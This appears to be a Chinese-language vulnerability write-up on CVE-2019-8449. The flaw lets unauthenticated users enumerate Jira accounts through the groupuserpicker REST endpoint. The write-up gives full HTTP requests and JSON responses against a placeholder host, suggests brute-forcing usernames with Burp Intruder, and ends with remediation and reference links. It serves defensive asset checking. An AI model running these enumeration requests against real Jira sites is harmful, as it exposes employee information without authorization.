CVE-2019-8449 poc出了 排查了公司的资产，验证漏洞并推动了几个Jira站点的升级

Atlassian Jira 8.4.0之前版本/rest/api/latest/groupuserpicker接口允许未授权查询员工信息，攻击者可以通过爆破用户名名单等方法获取用户信息

影响版本： 7.12< 受影响版本<8.4.0
漏洞危害：未授权枚举用户名，导致用户信息泄露
漏洞评级：低危

某JIRA站点jira.test.com

我以目标是虚假的情况下，jira.test.com没有testuser12345用户进行请求

GET /rest/api/latest/groupuserpicker?query=testuser12345&maxResults=50&showAvatar=false HTTP/1.1
Host: jira.test.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

该站点会返回一串json数据，说明找不到该用户

{"users":{"users":[],"total":0,"header":"显示 0 匹配的用户(共 0个)"},"groups":{"header":"显示 0 个匹配的组(共 0个)","total":0,"groups":[]}}

但是当我以一个已知用户身份测试时

GET /rest/api/latest/groupuserpicker?query=DesMond&maxResults=50&showAvatar=false HTTP/1.1
Host: jira.test.com
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

会返回相应用户的一些信息

{"users":{"users":[{"name":"Desmond","key":"Desmond","html":"Desmond(Des)-test (<strong>Desmond</strong>)","displayName":"Desmond(Des)-test"}],"total":1,"header":"显示 1 匹配的用户(共 1个)"},"groups":{"header":"显示 0 个匹配的组(共 0个)","total":0,"groups":[]}}

因此此漏洞可以通过爆破的方式使用一些用户名单爆破用户信息，使用burp 的intruter模块就好

不过通常来说，jira都部署在企业内网，且此次信息泄漏的接口泄漏的信息都是员工的信息，包括部门，职位等，危害较小，因此评级低危

1.JIRA升级至官方最新版本
2.配置安全组，限制只允许可信源IP访问

https://github.com/mufeedvh/CVE-2019-8449/
pocsuite https://www.seebug.org/vuldb/ssvid-98130

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8449
https://jira.atlassian.com/browse/JRASERVER-69796https://github.com/mufeedvh/CVE-2019-8449/